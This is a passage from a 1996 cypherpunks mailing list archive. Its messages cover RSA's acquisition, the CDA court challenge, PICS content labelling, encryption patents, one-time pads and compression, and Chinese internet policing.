apparently SDI never felt the market opportunities were sufficient to lure
them into the political malestrom around crypto... until now.)

         I have no secrets to share, but it would surprise me if many SDI
customers don't read a major opportunity for themselves in SDI's purchase
of RSA.  Last fall, SDI upgraded its ACE/Server to a new version (2.X)
which manages user records on a fully-integrated Progress relational
database.  This integration of a SQL and 4GL-accessible RDBS brought a
whole new level of functionality, complexity, and opportunity into ACE
system administration -- but it also offers the security, scalability, and
RDBS-to-RDBS communication options necessary to manage enterprise-wide IS
security systems.

        Managing a large key-management system through a flat text database
would be a nightmare.  With the flexibility of an indexed RDBS, it becomes
feasible to look to SDI's ACE/Server as a vehicle to hold and manage crypto
keys, either PKC pairs or symmetrical keys, for an enterprise-wide system
with multiple and distributed sysadmin sites.  Some ACE/Server systems now
support over 20,000 SecurID users, and the ESQL comm options will finally
open the door to integrated multiple-server environments.

>The question of the day is... HOW WILL THIS AFFECT CRYPTO?

        I have no answer on that one, but the marrage of RSA's technology
and SDI's marketing muscle -- given RSA's credibility and SDI's installed
base in commercial MIS sites -- unveils a world of interesting
opportunities.

        One interesting thought: since SDI has a shoe-leather sales force
on the street in 20-odd nations, SDI (with RSA) might be able to leverage
an integrated crypto/authentication technology and sell in markets where
RSA's algorithms doesn't even enjoy patent protection.  In the best of
commercial traditions, SDI would be selling a solution rather than a
technology.

        Suerte,
                                _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 17 Apr 1996 07:38:33 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Court Challenge: Update #7 (Ducks on the Net)
In-Reply-To: <ad987d0e0002100459cc@[205.199.118.202]>
Message-ID: <Pine.ULT.3.92.960416110237.22275A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, Timothy C. May wrote:

> At 12:51 AM 4/16/96, Declan B. McCullagh wrote:
>
> >In this update: Ducks on the Net!
> >                More on BYU's Dan Olsen's censorhappy boondoggle
> >                Grey Flannel Suit wears Blue Pinstripe, surfs for porn
>
>
> ????
>
> Apparently "The Netly News" has given up on simple, straightforward
> reporting in favor of "Pop Journalism." Cute headlines instead of
> informative ones.

You say that as if it's something new.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 17 Apr 1996 03:19:56 +0800
To: cypherpunks@toad.com
Subject: IRO_nic
Message-ID: <199604161513.LAA27379@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-16-96. Jour:

   "Bidzos Holds Key to Guarding Internet Secrets."

      Mr. Bidzos has made shrewd deals to build a powerful
      franchise, but he has also angered the government's
      security apparatus and some of his own customers and
      partners. Mr. Bidzos has fended off the government with
      a mix of stratagems and chutzpah. Lynn McNulty, an ex-
      Commerce official, said Mr. Bidzos always found "the
      open door that we hadn't thought about locking." Adds
      NSAper Stew Baker, "Jim has made a career out of bashing
      the NSA."

   4-16-96. Fint:

   "A hacker's paradise. One computer on the Internet is
   broken into every 20 seconds."

      Despite a proliferation of computer security products
      ranging from "secure" server and browser software to
      firewalls, encryption and authentication schemes,
      computer break-ins are on the rise. Security experts say
      US Internet sites are under frequent attack by hackers
      from eastern Europe. But there are also now more than
      20,000 aggressive, deliberately destructive hackers in
      the US and the number is said to be growing at a minimum
      of 5 per cent per month. Ironically, as the number of
      sophisticated hackers rises, there is a dire shortage of
      computer security professionals.


   IRO_nic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 17 Apr 1996 05:29:18 +0800
To: John Young <jya@pipeline.com>
Subject: Re: 20,000 hackers!
In-Reply-To: <199604161513.LAA27379@pipe1.nyc.pipeline.com>
Message-ID: <3173CBE0.2820@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:

> Security experts say US Internet sites are under frequent attack by
> hackers from eastern Europe. But there are also now more than
> 20,000 

How do they count them?  Do they just add up the subscription list to
"2600" and attendees at CFP & HoHoCon?

> aggressive, deliberately destructive hackers in the US and the number
> is said to be growing at a minimum of 5 per cent per month. Ironically, 
> as the number of sophisticated hackers rises, there is a dire shortage 
> of computer security professionals.

Is a destructive aggressive hacker who makes money at it a "computer
security professional"? :-)

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Wed, 17 Apr 1996 06:54:48 +0800
To: perry@piermont.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <199604161843.LAA19508@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:07 AM 4/16/96 -0400, Perry E. Metzger wrote:

>...Usually, random
>sequences are non-compressable, but it is possible (though very
>improbable) for Hamlet to appear out of a random number generator,
>and it is of course quite compressable...

But even if it came from a completely random source, it would 
still make a bad one-time pad.  When people say "compressable" 
or "algorithmic complexity" or "random", a context is always implied.  

In the context of "fair coin flips" the text of Hamlet is NOT compressible.
Because no string is more likely than any other.  Any algorithm that could 
compress that string, will, on the average INCREASE the length of 
"fair coin flip" strings it tries to compress.

Under the context of "pads that might be used for cryptographic purposes" the 
text of Hamlet is quite compressible.  An attacker is much more likely to 
test for such a stream than one that appears more random.  So, even if you 
got "Hamlet" from a perfectly random source, you should reject it for crypto 
purposes.

There is an exception to this rule.  If you are so revered as a cryptographer 
that no analyst would believe that you would deliberately choose a
non-random pad, 
then it would be safe to use Hamlet if it appeared in a random source.

It is amazing that one's reputation can affect the randomness of the bitstrings 
one uses.  

PS:
I have written a compressor that can compress ANY string to the single byte "X".
There are 2**n different decompressor programs, where n is the bit size of the 
original file.  All you have to do is specify the number of the correct 
decompressor program, and you have the original file.  Note that no computer 
is required for either the compressor or the decompressor.  (patent pending)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 17 Apr 1996 05:28:30 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Money supply is fake anyway
In-Reply-To: <199604121257.IAA24747@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960416114925.6156C-100000@kolo.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



[only relevant in terms of ecash lending and counterfeiting effect on the 
money supply]

On Fri, 12 Apr 1996, Perry E. Metzger wrote:

> You are correct that the fed creates and destroys money. You are not
> correct that ordinary banks do, or in your assertion that the fed
> substantially controls the expansion of the money supply through the
> discount rate.

We may be talking about different definitions of "making money."

I'll quote from "Secrets of the Temple" by Wiliam Greider... 

"New money was created not only by the Federal Reserve but also by private
commercial banks.  They did it by new lending, by expanding the
outstanding loans on their books.  Routinely, a bank borrowed money from
one group, the depositors, and lent it to someone else, the borrowers, a
straightforward function as intermediary.  But, if that was all that 
occurred, then credit would be frozen in size, unable to expand with new 
economic growth.  On the margins, therefore, bankers expanded their 
lending on their own and the overall pool of credit grew - and the bank 
turned credit into money."

If the Fed was the only organization that create or destroyed money
(through sales and purchases of federal securities), then the money supply
could be finely controlled.  The reality is that the money supply can only
be slightly controled by the Fed. 

The challenge of the Fed, though, is that banks create money with 
credit.  If the Fed makes $1 billion through the purchase of securities, 
that $1 billion injection will be multiplied by bank lending and credit 
up to $5 billion of new deposits, which would now be counted in the M1 
money supply.  

The banks would loan out $840 million of new loans (keeping 16% for
reserves), creating $840 in new deposits.  Those new deposits would enable
banks to loan out $706 million, and so on, and so on, until around $5
billion would be created.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 17 Apr 1996 17:16:42 +0800
To: cypherpunks@toad.com
Subject: PICS [LONG]
Message-ID: <199604161912.MAA13991@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Since PICS seems to be getting favorable comment in the CDA lawsuit, and it
has cypherpunks relevance, I thought I would post some its most relevant
features.  From http://www.w3.org/pub/WWW/PICS/iacwc.htm

>Labels can include two optional security features.  The first is a message
>integrity check on the content of the resource that is labeled, in the form of
>an MD5 message digest... The second is a digital signature on the contents of
>the label itself... 
>
>... PICS specifies three ways to distribute labels. The first is to embed
>labels in HTML documents. This method will be helpful for those who wish to
>label content they have created. 
>
>The second method is for a client to ask an http server to send labels along
>with the documents it requests. The server would most likely offer the
>publishers' labels, but a server could also redistribute labels from third
>parties that it cooperates with. [Client sends URL of label service to browser
>which responds with that service's label.  bf]
>
>The third way to distribute labels is through a label bureau that dispenses
>only labels. A bureau could distribute labels created by one or more labeling
>services. A client asks the bureau for certain services' labels of specific
>resources. This is most likely to be used for third-party labels. 
>
>... PICS-compatible software can implement selective blocking features in
>various ways. ...[In] a browser ...On each computer, as part of the network
>protocol stack. ... Somewhere in the network, for example at a proxy server
>used in combination with a firewall. ...
>
>PICS specifies very little about how to run a labeling service, beyond the
>format of the service description and the labels. Services can provide simple
>permission/prohibition labels, or provide information about any dimensions
>that they choose, from sex to coolness to literary quality. ... Third party
>labelers are likely to use a wide range of other dimensions. ... An
>interesting intermediate offering may be to label the resources that
>subscribers ask about: while there are thousands of sites and millions of
>resources available on the Internet, any particular set of users is likely to
>ask for access to a much smaller set. This approach could be particularly
>effective for a cooperative service formed by a number of like-minded parents
>or teachers. 
>
>While the primary goal of PICS is to facilitate the use of labels by selection
>software, PICS-compatible labels can also be used in other ways. For example,
>a labeling service might rate based on quality or classify resources by
>subject, ... Browsers could incorporate the contents of labels into visual
>displays that aid browsing, perhaps highlighting in green links to
>particularly popular or high-quality items or striking a red line through
>links to resources that are not recommended. It has even been suggested that
>labels could convey copyright ownership, distribution rights, and requested
>payments. Software could check for such labels and demand payment before
>distributing the labeled items. 

>One particularly promising application is collaborative filtering, where
>everyone can contribute ratings, and those ratings are used to guide others
>toward interesting materials. Guidance can be personalized by matching
>end-users with others who have similar tastes, as reflected in their ratings
>of resources that both have examined. A browser add-in feature would enable
>end-users to submit PICS rating labels to a labeling service. 


Obviously, to get the full benefit of the technology, we will need more
sophisticated browser support than just "access denied".  If you contract
with an outside service, one question to ask is, "Are you logging my
accesses?"


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Wed, 17 Apr 1996 06:32:43 +0800
To: tcmay@got.net
Subject: Re: CDA Court Challenge: Update #7 (Ducks on the Net)
Message-ID: <199604161746.MAA00539@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Hope the Kinks don't see this. (Ducks on the Wall).

>Excerpts from cypherpunks: 15-Apr-96 Re: CDA Court Challenge: Up..
> by
>Timothy C. May@got.net 
>> ????
>>  
>> Apparently "The Netly News" has given up on simple, straightforward
>> reporting in favor of "Pop Journalism." Cute headlines instead of
>> informative ones.
>>  
>> (The reason I no longer try to wade through the cuteness of
> "Wired,"
>> another example of postmodernism carried too far.)
>
>The headlines were mine, not The Netly News'. They do not appear on
>TNN's web site.
>
>-Declan, now guilty of "cute headlines"
>
>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMXPc0BKvccEAmlQ9AQFHigf/Qy1h07dX6GQF6Bqoqz7y9SG8IrIQYaDE
M88a+4r/k90caBDE42T0l7aiZpjuehLIq/ouvrFtW3ZTM5Z1aEM6GdhF30f794qK
el0dZWBztePlNhINDBauXUQQlDa+o4QSEhJHBOfBoN1k1sOpjlumimeNjZpgaTYv
ZU1ufXlb6DcfaAePsJUWezLzcZx7Y9RCZAcCKV941/UOsNqPcogCimlieVwu0EEf
ZJNRFGXb1ZfHvgyAzsEoP2QfajXudboGyeLY66fRS1uFwdzKQ2WbUI+dRzWRPchA
Rm54MsDVusEemw9auho83olNlJ189n1Oi8cvhKOa6LIr0Sc6sGBHrg==
=wEGj
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Wed, 17 Apr 1996 06:30:11 +0800
To: eriksmit <olbon@dynetics.com>
Subject: Re: [NOISE] Consolidation of threads ...
Message-ID: <v01540b09ad9981f27fbb@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:58 PM 4/15/95, eriksmit wrote:
>Clay Olbon II wrote:
>>
>> OK, I have a proposal that consolidates two threads that have been
>> discussed recently.  How about proposing legislation that mandates that a
>> byte is now 9 bits instead of 8.  This would allow the ninth bit to be the
>> decent/indecent bit, thereby solving all of our problems.
>>
>>         Clay
>>
>> ---------------------------------------------------------------------------
>> Clay Olbon II            | Clay.Olbon@dynetics.com
>> Systems Engineer         | ph: (810) 589-9930 fax 9934
>> Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
>> 550 Stephenson Hwy       | PGP262 public key: on web page
>> Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
>>                      TANSTAAFL
>> ---------------------------------------------------------------------------
>
>Get me off from the list

OK, this is either a comment on my admittedly weak attempt at humor, or the
unsubscrives have gotten more creative <g>

Go Wings!
        Clay






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 17 Apr 1996 05:40:19 +0800
To: brucem@wichita.fn.net
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
Message-ID: <01I3LZNNU4DC8Y52YJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Bruce Marshall <brucem@wichita.fn.net>

>    However, I do feel that you may have a valid point when switching 
>"hackers" to "opponents of the research."  Anyone with an interest in 
>preventing or slowing down the progress in such a project would be more 
>dangerous in my mind than your average hacker.  

>    Preventing that from happening would be necessary if it is decided 
>that such a threat truly exists. 

	Actually, people would also have a motivation to turn in false results
if they were being paid (perhaps in ecash) for their computer time. If they
could take less time and turn in a supposedly correct job, they would be
able to be paid the same amount for less work. Fortunately, it does appear
possible to filter out bad ones. In creating such a paid system, keeping this
possibility in mind would be needed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 17 Apr 1996 07:13:43 +0800
To: cypherpunks@toad.com
Subject: A possible problem with more regulation possible?
Message-ID: <01I3M1YLW11S8Y52YJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This proposal would appear to increase vulnerability to regulation.
	-Allen

From:	IN%"educom@elanor.oit.unc.edu"  7-APR-1996 18:42:00.83

>MORE ROUTERS = MORE INTERNET BROWNOUTS
>As businesses and Internet operators keep adding routers to speed electronic
>content on its way, the proliferation of routing devices actually begins to
>slow traffic, causing Internet "brownouts" -- when the response time slows
>to a crawl.  The solution could be an updated Internet, redesigned for
>fewer, more powerful routers, so that data packets need fewer hops.  "The
>U.S. Internet is about as reliable these days as the phone system in
>Russia," says NetStar's VP for sales and marketing.  (Business Week 8 Apr 96
>p82)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 17 Apr 1996 08:02:15 +0800
To: cypherpunks@toad.com
Subject: Email address for Comments on Internet Phone Petition
Message-ID: <01I3M2BGU3QC8Y52YJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I haven't seen it here before, so I'll inform you that the address for
comments on the ACTA petition is rm8775@fcc.gov. All such comments should
reference RM No. 8775 in the subject. (I'm not sure why, since it's in the
address, but this is the government...)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 17 Apr 1996 08:26:39 +0800
To: cypherpunks@toad.com
Subject: El Gamal
In-Reply-To: <2.2.32.19960416070406.00a8a95c@mail.teleport.com>
Message-ID: <Pine.LNX.3.92.960416143624.178B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Apr 1996, Alan Olsen wrote:

> At 01:15 AM 4/16/96 -0500, K00l Secrets wrote:
> >> If the Diffie-Hellmann patent covers all kind of public key crypto,
> >> you need a license from Cylink, i.e. BSAFE is not enough, and if it
> >> doesn't you can use El Gamal without a license.
> >
> >Are there any freely available implementations of El Gamal?
>
> From what I remember, RSA had made various legal threats to anyone using El
> Gamal.  (They claimed it was covered under their patents.)  Since the
> Cylink/PKP blowup, I am not certain of the status of this algorithm.
>
> Does anyone have more information on the current status of El Gamal?

Last I heard, El Gamal was not considered to be covered under the D-H patent.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMXPpKbZc+sv5siulAQGi0AP/fOfXEu80ifJqVaa5IQZYrZ1MATJjfXCL
QEJC4BC/6KbPxrXubLO8a/l5GtbgAZ7N3CLo5ANkKL/BHNG0yrEaaPmbtWD0cx9G
o6BU2Kd+PAC6zSf5hMJjri6x7zKBPATO+Sxb67NT75sB5LwJJD0FOyTGGcCzrIYi
XApaDOTaeNA=
=FqbA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 17 Apr 1996 15:46:08 +0800
To: cypherpunks@toad.com
Subject: [Noise] Amusing keyboard slip
Message-ID: <199604162223.PAA00113@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Discovered accidentally this morning:
Type 'logout' on a QUERTY keyboard with the right hand too far right
and get ';pgpit'.  Words to live by...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ssalgaller@CCGATE.HAC.COM
Date: Wed, 17 Apr 1996 15:06:31 +0800
To: cypherpunks@toad.com
Subject: What's the "Human Interaction Institute" at CMU For ???
Message-ID: <9603168296.AA829695326@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


          Dear Concerned Citizens,

          Re: Subject, what is Dan Olsen going to be in charge of at
          CMU ? (ref: CDA debate; expert witness for the CDA)

          The title could refer to net censorship, or to bio-medical
          implantation of control computers inside human brains.

          So which is it ?

          Or is this not an exclusive or answer ?

          Stephen S.
          salgaller@ccgate.hac.com
          or try:
          salgaller@aol.com

          PS: If anyone can tell me the name of the 1965 movie
          starring Michael Renee that dealt with the above two issues,
          please tell me.

          If you were not aware, the movie dealt with a plan,
          initially, to link all humanity directly to each other. One
          could "download" data directly into your brain ! You could
          also have "mental telepathy" and communicate with others.
          Michael Renee's character escapes to the past to try to end
          research done by a scientist, that lead up to the inevitable

          a totalitarian world government takes control of everyone;

          even your thoughts are no longer private.

          You get the idea. This was also done as part of the movie
          "Terminator 2"; I wonder if the writer of the 1965 movie got
          any screen credit or royalties for T2 ???

          I'm worrying too much, right ? It can't happen here ???
          Tim Mc Veigh said he had a bio chip implant. Nah...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ssalgaller@CCGATE.HAC.COM
Date: Wed, 17 Apr 1996 18:19:51 +0800
To: cypherpunks@toad.com
Subject: Re[2]: What's the "Human Interaction Institute" at CMU For ???
Message-ID: <9603168296.AA829695327@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


          Dear Concerned Citizen,

          Am I the only one worrying about the use of technology to
          implement a "New World Order" ???

          If not, where else can I post this message ???

          Yes, AOL has a movie trivia board, but I'm serious !

          A similar concern could be made about biotechnology: with
          gene splicing, it would be possible to create a race of "sub
          humans" to do slave labor and fight wars.

          This has been done in several Sci-Fi movies, but it's not
          going to stay fiction much longer.

          Stephen S.

          PS: Shouldn't these be the questions that CMU worries about?
              Which is worse, genetic slavery or "dirty duck" photos ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 17 Apr 1996 02:20:47 +0800
To: cypherpunks@toad.com
Subject: TIME Daily: Policing China's Firewall
Message-ID: <199604161334.PAA25484@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>From http://pathfinder.com/time/daily/

Policing China's Firewall

BEIJING: The Chinese government is requiring all Internet users and
companies marketing Internet services to register with the police.
Mailed warnings from the Beijing Police Public Security Bureau
announce all individuals using the Internet must register with a
special police section of Computer Security Supervision, and include
their email addresses, presumably for monitoring purposes. The rules,
which are taking effect as these notices surface, require each Chinese
registering to sign a pledge agreeing to abide by Chinese law and
respect state security. Users are also required to pay a 400 yuan
(about $50) registration fee, and pay 100 yuan a month for six hours
nline time. The fee, close to a month's salary many urban Chinese,
could stop many from logging on. The country's some 100,000 Internet
users are already barred from newsgroups containing 'undesirable'
material such as government human rights violations and pornography.
"This is the latest move to try to control the Internet," says TIME's
Beijing Bureau Chief, Jaime Florcruz. "It dawned on the Chinese
government that new ideas from overseas were leaking into the psyche
of the Chinese people. It's still unclear how they will block the flow
 of information, especially when the government has such need for it,
itself. Its a losing battle, especially in the provinces. If the Party
cadres there want Internet access, or satellite TV, Beijing will have
a hard time curbing them."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 17 Apr 1996 10:22:24 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <Pine.BSF.3.91.960413133800.18548A-100000@kirk.edmweb.com>
Message-ID: <199604162053.QAA10650@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Steve Reid writes:
>Really, the apropriate place for content filtering is at the application 
>layer. It *could* be done at the transport layer, but that's really not 
>the place for it.

Izzat so?  So explain to me what the difference between the PICS type
ratings and security classifications is.  If something is labelled "Top
Secret" with some compartments, it means "do not deliver this to a
principal which hasn't been authorized to receive it".  If something is
labelled "Not suitable for minors", it means "do not deliver this to a
minor".  "Age of majority" is really no different than a security
clearance to receive certain information in the CDA context.

Clearly the IETF believed that the network layer was an appropriate
place for general classification when they developed IPv4.  I haven't
verified it, but I suspect that IPv6 has (or will have) an appropriate
mechanism for indicating security classification.  The identical
mechanism may be used for packet labelling, with the broad
classification indicating the distinctions between "G", "PG", "PG-13",
"R", and "NC-17", and the compartments available for such things as
"violence", "nudity", "adult language", "sexual content",
"advertising", and so forth.

>Analogy: It would be like putting a license plate on the engine of a car. 
>It *could* be done that way, if you redesign the car so that the engine
>protrudes out from the back with a place for the license plate (let the
>technical people handle the technical details of that). But the best place
>for a license plate is on the outside body of the car, and the best place
>for content filtering is at the application layer. 

Of course, putting it at the application layer is like requiring that
every driver create his own license plate and hold it out the window
while driving.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 17 Apr 1996 14:18:50 +0800
To: Dave Del Torto <cypherpunks@toad.com>
Subject: Re: [IRS] Elvis in Escrow
Message-ID: <199604162254.PAA01128@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:40 AM 4/16/96 -0700, Dave Del Torto wrote:
>[from SF Examiner somewhere around 12-14 April 96]
>
>..............................................................................
>
>"IRS Worker Took Peek at Celebrities' Records"
>[Associated Press]
>  Memphis - A former IRS employee who said boredom had led him to peek at
>the tax records of President Clinton, Elvis Presley and other famous people
>has been acquitted of federal charges.
>
>
>
>Hmmm. _We_ do it, it's "malicious cracking/hacking" and they toss us in the
>clink... _they_ do it, and it's "practice" (and they get acquitted). And
>_these_ are the people who want to escrow _my_ keys? As IF!

I wonder, how much is NSA's secret key worth?  You know, the one they use
to grab the extra key bits that Lotus Notes sends them.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Wed, 17 Apr 1996 15:07:47 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604162053.QAA10650@universe.digex.net>
Message-ID: <Pine.BSF.3.91.960416155004.1639A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Really, the apropriate place for content filtering is at the application 
> >layer. It *could* be done at the transport layer, but that's really not 
> >the place for it.

> Clearly the IETF believed that the network layer was an appropriate
> place for general classification when they developed IPv4.  I haven't
> verified it, but I suspect that IPv6 has (or will have) an appropriate
> mechanism for indicating security classification.  The identical
> mechanism may be used for packet labelling, with the broad

Security classification and "decent/indecent" ratings are rather
different, IMHO. With security, the author of the data has to decide the
best rating for his/her own security. With decent/indecent filtering, the
author has to decide what is best for _other_people_. I suppose it's not 
as bad as that with the third-party ratings in PICS, but there will still 
be inconsistancies.

The main reason I think decent/indecent filtering should be done at the
application level is, if they create a ratings system and later decide
that they've screwed up and another system would be better (which is quite
possible, if you understand the previous paragraph), all that's really
required is re-writing the application software. OTOH, if they did it at
the transport layer and later decided to switch to something else, they
would have to change the protocol, which is very difficult. And, depending
on the changes, they may have to re-write the apps again anyways. 

Also, at the application layer, ANYONE could create their own ratings
system, and the market could decide which is best. (The downside of that 
is that there would be nonstandardized chaos for a while).

Just My Humble Opinion.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Wed, 17 Apr 1996 15:27:09 +0800
To: perry@piermont.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <199604162331.QAA23163@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:34 PM 4/16/96 -0400, Perry E. Metzger wrote:

>> ...it is possible ... for Hamlet to appear out of a random number generator,

>> But even if it came from a completely random source, it would 
>> still make a bad one-time pad.

>No it wouldn't. 

Are you sure you want to claim that the text of Hamlet would make 
a good key for a one-time pad?

>There is a tiny but nonzero probability that xoring
>your one time pad with your text will result in a cyphertext equal to,
>say, the Bible. Big deal. 

Most unusual, and you're right, its inconsequential.  But if you use the 
text of Hamlet or the text of the Bible for your KEY to a one-time-pad,
you're very likely to get broken.  I think any pad that is likely to get 
broken is a bad pad.

>If the key is really random, the
>cryptanalyst has no way to tell what the underlying text was.

But that silly cryptanalyst might not know that you got Hamlet from 
your random number generator.  He might think you copied it out of a 
book!  Then, Hamlet stops being a random number.  The context changes.

>> In the context of "fair coin flips" the text of Hamlet is NOT compressible.

>There is only one context in which things are compressable or not --
>is there a smaller representation for them.

Suppose that somewhere on the web is an archive of "The Encyclopedia"(tm).
I could add a preprocessor to zip that would compare the input file to 
"The Encyclopedia".  If it finds a match, it outputs a zero-byte.
If it doesn't find a match, it outputs a one-byte followed by an 
ordinary zip file.

The decompressor compares the compressed file to a single zero, and if it is 
equal, accesses "The Encyclopedia" and sends it to the output file.  Otherwise 
it just unzips the rest of the file normally.

I now have a one-byte representation for "The Encyclopedia".
(by the way, this will work with 6 and 7 and 8 and 9 and 12-bit bytes!)

That's not really fair.  I took advantage of a particular situation.  
But that's what ALL compressors do.  They take advantage of particular 
patterns. And patterns are determined by context.

This is where it gets interesting.  The "randomness" of "The Encyclopedia" 
depends on whether some archive is online!  If someone deletes "The
Encyclopedia"
archive, or disconnects my communications, my special compressor stops working, 
and the smallest (reversable) representation jumps many orders of magnitude.  
When the context changes, the smallest representation changes.

As you point out, when the Hamlet comes out of a good random number generator, 
it is just as random as any other number.  But I contend that when Hamlet 
can XOR with your ciphertext to reveal your plaintext, then Hamlet is NOT 
a random number.  When did it stop being random?  When then context changed.











>
>> Because no string is more likely than any other.  Any algorithm that could 
>> compress that string, will, on the average INCREASE the length of 
>> "fair coin flip" strings it tries to compress.
>
>True enough, but the claim was that a random string has no
>representation which is smaller than itself.
>
>.pm
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 17 Apr 1996 15:22:28 +0800
To: Scott Brickner <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: PICS required by laws
Message-ID: <199604162331.QAA05370@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:02 PM 4/16/96 -0500, Scott Brickner wrote:
>"E. ALLEN SMITH" writes:
